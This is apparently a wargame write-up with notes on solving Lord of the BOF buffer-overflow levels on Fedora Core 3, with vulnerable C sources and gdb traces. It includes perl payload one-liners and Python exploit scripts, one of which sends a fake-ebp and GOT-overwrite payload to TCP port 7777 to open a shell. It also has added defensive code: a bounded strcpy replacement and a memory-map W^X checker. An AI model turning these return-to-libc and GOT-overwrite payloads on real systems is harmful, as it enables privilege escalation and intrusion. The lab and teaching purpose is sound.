This isn't really a write-up; I'm just posting the notes I scribbled down while working through the problems.
Maybe they'll be a hint to someone;;;;-0-;....
maybe?;; heh
-------------------------------------------------------------------------------------
[FC3 - 5 problems in total]
* FC1~FC3 all use the same environment, so I start from the FC3 environment.
[Address]
http://work.hackerschool.org/DOWNLOAD/TheLordOfTheBOF/VM_FC3.zip
[Environment summary]
Stack Dummy : O
Down privilege of bash : O
Random Stack : O
Random Library : X
Random Program Binary Mapped : X
ASCII Armor : O
Non-Executable Stack : O
Non-Executable Heap : O
Stack Canary : X
Stack Smashing Protector : X
[Mobs]
gate -> iron_golem : Fake_SFP + Ascii Armor
iron_golem -> dark_eyes : RET Sleding
dark_eyes -> hell_fire : another fake_ebp or got overwriting
hell_fire -> evil_wizard : POP POP RET
evil_wizard -> dark_stone : POP POP RET / Remote
===================================================================================
[gate@Fedora_1stFloor ~]$ cat iron_golem.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - iron_golem
        - Local BOF on Fedora Core 3
        - hint : fake ebp
*/
#include <stdio.h>   /* includes not in the original listing; added for a clean build */
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);   /* unbounded copy: the overflow */
    printf("%s\n", buffer);
}
[gate@Fedora_1stFloor ~]$
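As an added example (my code, not part of the post or of the wargame), here is the bounded form of the copy in iron_golem.c above. The program's only defect is that strcpy(buffer, argv[1]) has no bound; the fix is to measure the input before writing and refuse it when it does not fit, rather than truncating it. Function names (bounded_copy, handle_arg, handle_repeated) and the status codes are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256

enum { COPY_OK = 0, COPY_TOO_LONG = 1 };

/* The pattern used by every level in this set: copies until the NUL with no bound.
 * Kept only for contrast; nothing below calls it with untrusted input. */
void unbounded_copy(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: measure first, then copy, and fail closed if the input does not
 * fit together with its terminator. The destination is never touched on failure,
 * so an over-long argument cannot reach the saved frame pointer or return address. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')   /* never scans further than dst_size bytes */
        n++;
    if (n >= dst_size)
        return COPY_TOO_LONG;                /* no room for the NUL: reject, do not truncate */
    memcpy(dst, src, n + 1);
    return COPY_OK;
}

/* main() of iron_golem.c with the copy replaced; returns a status so it can be tested. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    int rc = bounded_copy(buffer, sizeof buffer, arg);
    if (rc != COPY_OK) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return rc;
    }
    printf("%s\n", buffer);
    return COPY_OK;
}

/* Test helper: feeds handle_arg a constructed argument of `count` copies of `c`. */
int handle_repeated(char c, size_t count)
{
    char *arg = malloc(count + 1);
    if (arg == NULL)
        return -1;
    memset(arg, c, count);
    arg[count] = '\0';
    int rc = handle_arg(arg);
    free(arg);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    return handle_arg(argv[1]);
}
```

With BUF_SIZE 256 the longest accepted argument is 255 bytes, because the terminator needs the last slot; the 264-byte offsets used in the payloads throughout these notes are beyond anything this version can ever write. The saved_sfp save-and-restore in the later levels is a puzzle mechanic, not a defence: it puts one word back after the overflow has already happened.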
==================================================================================
Hmm...
Change things so that leave/ret references a fake stack.
Copy the system function address with strcpy.
Hmm.. as expected.... what I had in my head and actually trying it turn out pretty different....... let me organize a bit..
fake ebp, huh....hmm.. it feels like plain RTL should work too.. ah.. plain RTL is hard because of ASCII armor, I guess..
$1 = {<text variable, no debug info>} 0x7a5720 <execl>
First of all, I can change EIP. Since a 00 gets appended automatically at the end, execl can at least be called.
"`perl -e '{print "A"x264,"B"x4,"\x20\x57\x7a" }'`"
But it seems to die inside execl while referencing its arguments.
Looking at execl, it references its variables relative to ebp, and in the function prologue
0x007a5720 <execl+0>: push %ebp
0x007a5721 <execl+1>: mov %esp,%ebp
there is a part that sets the current esp as ebp, like this.
So if I jump to execl+3 and set ebp to a suitable value at the moment it gets changed by main's leave/ret, exploitation looks possible.
0x8048d80: 0x00000000 0x0804851c 0x00000000 0x000e0003
(gdb) x/x 0x0804851c
0x804851c <_fp_hw>: 0x00000003
[gate@Fedora_1stFloor ~]$ ./tttt_ttttt "`perl -e '{print "A"x264,"\x80\x8d\x04\x08","\x23\x57\x7a" }'`"
I picked an arbitrary region for ebp, and it seems to error out while writing through the faked ebp.
I need to find a writable region.
[gate@Fedora_1stFloor ~]$ cat /proc/26478/maps
00703000-00718000 r-xp 00000000 fd:00 68707 /lib/ld-2.3.3.so
00718000-00719000 r--p 00014000 fd:00 68707 /lib/ld-2.3.3.so
00719000-0071a000 rw-p 00015000 fd:00 68707 /lib/ld-2.3.3.so
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
00841000-00843000 rw-p 00841000 00:00 0
08048000-08049000 r-xp 00000000 fd:00 424355 /home/gate/tttt_ttttt
08049000-0804a000 rw-p 00000000 fd:00 424355 /home/gate/tttt_ttttt --> here.
f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0
fee28000-ff000000 rw-p fee28000 00:00 0
ffffe000-fffff000 ---p 00000000 00:00 0
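To make the "which region is writable" step above repeatable, here is an added /proc/<pid>/maps parser (my code, not from the post). It loads the twelve lines of the listing above and answers two questions a defender asks of the same data: are any mappings both writable and executable (the W^X check that backs the "Non-Executable Stack" and "Heap" entries in the environment summary), and which file-backed pages are writable. Names such as parse_maps_line, count_wx and writable_at are mine; the sample text is the listing above with the annotation removed.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* One line of /proc/<pid>/maps, reduced to what a W^X audit needs. */
struct mapping {
    uint64_t start, end;   /* [start, end) */
    char perms[5];         /* e.g. "rw-p" */
    char path[64];         /* backing file, or "" for an anonymous mapping */
};

/* Parses a single maps line. Returns 1 on success, 0 if the line is not a maps record. */
int parse_maps_line(const char *line, struct mapping *m)
{
    unsigned long long start, end, offset, inode;
    unsigned dmaj, dmin;
    int consumed = 0;

    memset(m, 0, sizeof *m);
    if (sscanf(line, "%llx-%llx %4s %llx %x:%x %llu%n",
               &start, &end, m->perms, &offset, &dmaj, &dmin, &inode, &consumed) != 7)
        return 0;
    if (strlen(m->perms) != 4)
        return 0;
    m->start = start;
    m->end = end;
    sscanf(line + consumed, " %63s", m->path);   /* optional path; stays "" when absent */
    return 1;
}

/* Splits a whole maps dump into records. Lines that do not parse are skipped. */
size_t parse_maps_text(const char *text, struct mapping *out, size_t cap)
{
    size_t n = 0;
    const char *p = text;
    while (*p != '\0' && n < cap) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        size_t keep = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, keep);
        line[keep] = '\0';
        if (parse_maps_line(line, &out[n]))
            n++;
        p += full + (nl ? 1 : 0);
    }
    return n;
}

/* Number of mappings that are writable AND executable: any non-zero count breaks W^X. */
int count_wx(const struct mapping *maps, size_t n)
{
    int c = 0;
    for (size_t i = 0; i < n; i++)
        if (maps[i].perms[1] == 'w' && maps[i].perms[2] == 'x')
            c++;
    return c;
}

/* Index of the mapping containing addr, or -1 if the address is unmapped. */
int find_mapping(const struct mapping *maps, size_t n, uint64_t addr)
{
    for (size_t i = 0; i < n; i++)
        if (addr >= maps[i].start && addr < maps[i].end)
            return (int)i;
    return -1;
}

int writable_at(const struct mapping *maps, size_t n, uint64_t addr)
{
    int i = find_mapping(maps, n, addr);
    return i >= 0 && maps[i].perms[1] == 'w';
}

/* Sample input: the listing from the post above (annotation removed). */
static const char SAMPLE_MAPS[] =
    "00703000-00718000 r-xp 00000000 fd:00 68707 /lib/ld-2.3.3.so\n"
    "00718000-00719000 r--p 00014000 fd:00 68707 /lib/ld-2.3.3.so\n"
    "00719000-0071a000 rw-p 00015000 fd:00 68707 /lib/ld-2.3.3.so\n"
    "0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so\n"
    "0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so\n"
    "0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so\n"
    "00841000-00843000 rw-p 00841000 00:00 0\n"
    "08048000-08049000 r-xp 00000000 fd:00 424355 /home/gate/tttt_ttttt\n"
    "08049000-0804a000 rw-p 00000000 fd:00 424355 /home/gate/tttt_ttttt\n"
    "f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0\n"
    "fee28000-ff000000 rw-p fee28000 00:00 0\n"
    "ffffe000-fffff000 ---p 00000000 00:00 0\n";

struct mapping g_maps[32];
size_t g_count;

size_t load_sample(void)
{
    g_count = parse_maps_text(SAMPLE_MAPS, g_maps, 32);
    return g_count;
}

int main(void)
{
    load_sample();
    for (size_t i = 0; i < g_count; i++)
        printf("%08llx-%08llx %s %s\n", (unsigned long long)g_maps[i].start,
               (unsigned long long)g_maps[i].end, g_maps[i].perms,
               g_maps[i].path[0] ? g_maps[i].path : "[anon]");
    printf("writable+executable mappings: %d\n", count_wx(g_maps, g_count));
    return 0;
}
```

On a live system the same functions can be fed the contents of /proc/self/maps; the listing above shows no rw-x mapping at all, which is what the environment summary's NX entries promise, while the binary's second page (its data, GOT included) is the only file-backed writable region besides the libraries' own data pages.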
0x80492e0: 0x08049620 0x00000000 0x962425ff 0x00680804
(gdb) x/x 0x08049620
0x8049620 <_GLOBAL_OFFSET_TABLE_+8>: 0x0070e9e0
(gdb)
"`perl -e '{print "A"x264,"\xd8\x92\x04\x08","\x23\x57\x7a" }'`"
In strace it gets all the way to execve and looks like it's working... then suddenly a segmentation fault.. maybe the stack gets tangled and that causes the problem..
Accessing it from the core, that memory can't be accessed... it must be a part that shouldn't be written to.
15 .ctors 00000008 08049538 08049538 00000538 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 00000008 08049540 08049540 00000540 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 08049548 08049548 00000548 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 0804954c 0804954c 0000054c 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 08049614 08049614 00000614 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 0000001c 08049618 08049618 00000618 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 08049634 08049634 00000634 2**2
CONTENTS, ALLOC, LOAD, DATA
Let me refer to this and try again.
0x8049618 <_GLOBAL_OFFSET_TABLE_>: 0x0804954c 0x00000000 0x00000000 0x080482ee
(gdb) x/x 0x0804954c
0x804954c <_DYNAMIC>: 0x00000001
"`perl -e '{print "A"x264,"\x10\x96\x04\x08","\x23\x57\x7a" }'`"
[gate@Fedora_1stFloor ~]$ ./iron_golem "`perl -e '{print "A"x264,"\x10\x96\x04\x08","\x23\x57\x7a" }'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?Wz
bash-3.00$ id
uid=501(iron_golem) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
bash-3.00$ whoami
iron_golem
bash-3.00$ my-pass
euid = 501
blood on the fedora
bash-3.00$
bash-3.00$
Besides this method, there's also the approach of using a ret sled to slide along until a suitable stack comes up.
-> That method looks simpler.
Is there yet another way?..
=============================================================
[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark_eyes
        - Local BOF on Fedora Core 3
        - hint : RET sleding
*/
#include <stdio.h>   /* includes not in the original listing; added for a clean build */
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];
    char saved_sfp[4];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, argv[1]);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    printf("%s\n", buffer);
}
[iron_golem@Fedora_1stFloor ~]$
This is the method I suggested as an alternative in the first problem..
0x080484b9 <main+177>: ret
$1 = {<text variable, no debug info>} 0x7507c0 <system>
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
"`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08","\x20\x57\x7a" }'`"
Put the system function in place of execl (so I can check the error message),
and increase the RET sled one entry at a time to find the point where the stack stops changing.
[iron_golem@Fedora_1stFloor ~]$ ./tttt_tttt "`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08"x8,"\xc0\x07\x75" }'`" 2>out
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(묛꽮뭐뭐뭐?u
Segmentation fault
[iron_golem@Fedora_1stFloor ~]$ xxd out
0000000: 7368 3a20 85c0 757b 658b 3554 3a20 636f sh: ..u{e.5T: co
0000010: 6d6d 616e 6420 6e6f 7420 666f 756e 640a mmand not found.
[iron_golem@Fedora_1stFloor ~]$ ln -s /home/iron_golem/a.out `perl -e '{print "\x85\xc0\x75\x7b\x65\x8b\x35\x54"}'`
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08"x8,"\x20\x57\x7a" }'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?詰뭐뭐뭐뭐 Wz
bash-3.00$ id
uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t
bash-3.00$ whoami
dark_eyes
bash-3.00$ /bin/m
mail mkdir mknod mktemp more mount mt mv my-pass
bash-3.00$ /bin/my-pass
euid = 502
because of you
bash-3.00$
==============================================================
[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - hell_fire
        - Remote BOF on Fedora Core 3
        - hint : another fake ebp or got overwriting
        - port : TCP 7777
*/
#include <stdio.h>
#include <string.h>  /* not in the original listing; added for a clean build */

int main()
{
    char buffer[256];
    char saved_sfp[4];
    char temp[1024];

    printf("hell_fire : What's this smell?\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    fgets(temp, 1024, stdin);

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    printf("%s\n", buffer);
}
[dark_eyes@Fedora_1stFloor ~]$
[dark_eyes@Fedora_1stFloor ~]$
[temp][saved_sfp][buffer][sfp][ret][88byte][sfp][ret]
Since it runs remotely, using a fixed address rather than the stack looks better.. after pop-pop-ret, jumping to leave/ret should let me change ebp.
It's remote, but a somewhat strange kind of remote? lol
15 .ctors 00000008 08049674 08049674 00000674 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 00000008 0804967c 0804967c 0000067c 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 08049750 08049750 00000750 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 00000024 08049754 08049754 00000754 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 08049778 08049778 00000778 2**2
CONTENTS, ALLOC, LOAD, DATA
0x8049754 <_GLOBAL_OFFSET_TABLE_>: 0x08049688 0x007194f8 0x0070e9e0 0x08048382
(gdb) x/x 0x08049688
0x8049688 <_DYNAMIC>: 0x00000001
0x08048559 <main+213>: call 0x80483ac <_init+88>
0x0804855e <main+218>: add $0x10,%esp
0x08048561 <main+221>: leave
0x08048562 <main+222>: ret
0x08048563 <main+223>: nop
$1 = {<text variable, no debug info>} 0x7507c0 <system>
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
"`perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","\x4c\x97\x04\x08","\xc3\x07\x75" }'`"
Done this way it doesn't work, because esp gets changed by leave/ret.
What ways are there to do a fake ebp?... and how would a GOT overwrite be done?-_-;
Let me think about the first solution first..
First, the basic sfp gets restored.
If I set the ret address to leave/ret, the stack is restored to the earlier state of the function that called main.
Then, if I overwrite beyond that as well, ret
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x800}'
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9ABa0Ba1Ba2Ba3Ba4Ba5B"}'
Cannot access memory at address 0x64413967
(gdb) i r
No selected frame.
(gdb) print $esp
$1 = (void *) 0xfef1169c
(gdb) print $ebp
$2 = (void *) 0x64413963
Pattern 'c9Ad' found at offset(s) : 88
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\x23\x57\x7a\x00"}'
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
Hmm.. it works fine locally... but remotely............ it says it can't find the file.ㅡ.ㅡ;;
while true; do ./a.out >> stout; done;
(gdb) disassemble main
Dump of assembler code for function main:
0x08048484 <main+0>: push %ebp
0x08048485 <main+1>: mov %esp,%ebp
0x08048487 <main+3>: sub $0x518,%esp
0x0804848d <main+9>: and $0xfffffff0,%esp
0x08048490 <main+12>: mov $0x0,%eax
0x08048495 <main+17>: add $0xf,%eax
0x08048498 <main+20>: add $0xf,%eax
0x0804849b <main+23>: shr $0x4,%eax
0x0804849e <main+26>: shl $0x4,%eax
0x080484a1 <main+29>: sub %eax,%esp
0x080484a3 <main+31>: sub $0xc,%esp
0x080484a6 <main+34>: push $0x8048644
0x080484ab <main+39>: call 0x80483ac <_init+88> // printf
0x080484b0 <main+44>: add $0x10,%esp
0x080484b3 <main+47>: sub $0xc,%esp
0x080484b6 <main+50>: push $0x8048664
0x080484bb <main+55>: call 0x80483ac <_init+88> // printf
0x080484c0 <main+60>: add $0x10,%esp
0x080484c3 <main+63>: sub $0xc,%esp
0x080484c6 <main+66>: pushl 0x8049784
0x080484cc <main+72>: call 0x804837c <_init+40> // fflush
0x080484d1 <main+77>: add $0x10,%esp
0x080484d4 <main+80>: sub $0x4,%esp
0x080484d7 <main+83>: pushl 0x8049788
0x080484dd <main+89>: push $0x400
0x080484e2 <main+94>: lea 0xfffffae8(%ebp),%eax
0x080484e8 <main+100>: push %eax
0x080484e9 <main+101>: call 0x804838c <_init+56> // fgets
0x080484ee <main+106>: add $0x10,%esp
0x080484f1 <main+109>: sub $0x4,%esp
0x080484f4 <main+112>: push $0x4
0x080484f6 <main+114>: lea 0xfffffef8(%ebp),%eax
0x080484fc <main+120>: add $0x108,%eax
0x08048501 <main+125>: push %eax
0x08048502 <main+126>: lea 0xfffffef4(%ebp),%eax
0x08048508 <main+132>: push %eax
0x08048509 <main+133>: call 0x80483bc <_init+104> // memcpy
0x0804850e <main+138>: add $0x10,%esp
0x08048511 <main+141>: sub $0x8,%esp
0x08048514 <main+144>: lea 0xfffffae8(%ebp),%eax
0x0804851a <main+150>: push %eax
0x0804851b <main+151>: lea 0xfffffef8(%ebp),%eax
0x08048521 <main+157>: push %eax
0x08048522 <main+158>: call 0x80483cc <_init+120> // strcpy
0x08048527 <main+163>: add $0x10,%esp
0x0804852a <main+166>: sub $0x4,%esp
0x0804852d <main+169>: push $0x4
0x0804852f <main+171>: lea 0xfffffef4(%ebp),%eax
0x08048535 <main+177>: push %eax
0x08048536 <main+178>: lea 0xfffffef8(%ebp),%eax
0x0804853c <main+184>: add $0x108,%eax
0x08048541 <main+189>: push %eax
0x08048542 <main+190>: call 0x80483bc <_init+104> // memcpy
0x08048547 <main+195>: add $0x10,%esp
0x0804854a <main+198>: sub $0x8,%esp
0x0804854d <main+201>: lea 0xfffffef8(%ebp),%eax
0x08048553 <main+207>: push %eax
0x08048554 <main+208>: push $0x804866b
0x08048559 <main+213>: call 0x80483ac <_init+88> // printf
0x0804855e <main+218>: add $0x10,%esp
0x08048561 <main+221>: leave
0x08048562 <main+222>: ret
0x08048563 <main+223>: nop
End of assembler dump.
(gdb)
perl -e '{print "A"x264,"BBBB","\xf4\x84\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
perl -e '{print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7","BBBB","\xf4\x84\x04\x08","Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8A","\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
perl -e '{print "A"x264,"BBBB","\x09\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
0x080484e2
"\xe2\x84\x04\x08"
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x4,"B"x4,"C"x4,"A"x76,"\x88\x9c\x04\x08","\xe2\x84\x04\x08","\x01\x01\x01\x01","\x88\x97\x04\x08","B"x20}' > in
-1304
./tttt_tttt: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049750 R_386_GLOB_DAT __gmon_start__
08049784 R_386_COPY stdout
08049788 R_386_COPY stdin
08049760 R_386_JUMP_SLOT fflush
08049764 R_386_JUMP_SLOT fgets
08049768 R_386_JUMP_SLOT __libc_start_main
0804976c R_386_JUMP_SLOT printf
08049770 R_386_JUMP_SLOT memcpy
08049774 R_386_JUMP_SLOT strcpy
8049C88
perl -e '{print "A"x264,"BBBB","\xe9\x84\x04\x08","\x74\x97\x04\x08", "\x01\x01\x01\x01","\x20\xf7\x83\x00"}' > in
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x4,"B"x4,"C"x4,"A"x76,"\x88\x9c\x04\x08","\xe9\x84\x04\x08","\x74\x97\x04\x08", "\x01\x01\x01\x01","\x20\xf7\x83\x00"}' > in
[dark_eyes@Fedora_1stFloor ~]$ cat test.py
#!/usr/bin/python
#cmd_sub.py
import os
import time
import popen2
def execute(cmd) :
    std_out, std_in, std_err = popen2.popen3(cmd)
    return std_in, std_out, std_err
cmd = "./tttt_tttt"
std_in, std_out, std_err = execute(cmd)
#first_payload = "A"*264
first_payload = "/bin/sh;"*(264/8)
first_payload += "BBBB"
first_payload += "\x62\x85\x04\x08"*24
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x70\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
'''
first_payload = "A"*264
first_payload += "BBBB"
first_payload += "\x61\x85\x04\x08"
first_payload += "A"*88
first_payload += "\x88\x9c\x04\x08"
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x74\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
'''
second_payload = "\xc3\x07\x75\x00"
print "first payload : ", first_payload
print "second payload : ", second_payload
print std_out.readline()
std_out.flush()
std_in.write(first_payload)
std_in.write("\n")
std_in.flush()
std_in.write(second_payload)
std_in.write("\n")
std_in.flush()
print std_err.readline()
std_in.write("ls")
std_in.write("\n")
std_in.flush()
print std_out.readline()
print std_out.readline()
print std_out.readline()
[dark_eyes@Fedora_1stFloor ~]$ cat remote.py
#!/usr/bin/python
import socket
import telnetlib
first_payload = "/bin/sh;"*(264/8)
first_payload += "BBBB"
first_payload += "\x62\x85\x04\x08"*24
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x70\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
second_payload = "\xc3\x07\x75\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 7777))
data = s.recv(1024)
print "READ : ",data
#print "SEND", buffer
s.send(first_payload + "\n")
#data = s.recv(1024)
#print "READ : ",data
s.send(second_payload + "\n")
t = telnetlib.Telnet()
t.sock= s
t.interact()
t.close()
s.close()
Finally solved it..+_+...2013.10.10 01:00 AM
whoami
hell_fire
/bin/my-pass
euid = 503
sign me up
=================================================================================================
[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - evil_wizard
        - Local BOF on Fedora Core 3
        - hint : GOT overwriting
*/
#include <stdio.h>   /* includes not in the original listing; added for a clean build */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}

int main(int argc, char *argv[])
{
    char buffer[256];
    char saved_sfp[4];
    int length;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // for disturbance RET sleding
    length = strlen(argv[1]);

    // healing potion for you
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, argv[1]);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$
perl -e '{print "A"x264,"BBBB","\x93\x86\x04\x08","A"x88,"\x68\x98\x04\x08","\xc3\x07\x75\x00"}'
I just solved it with fake_ebp.
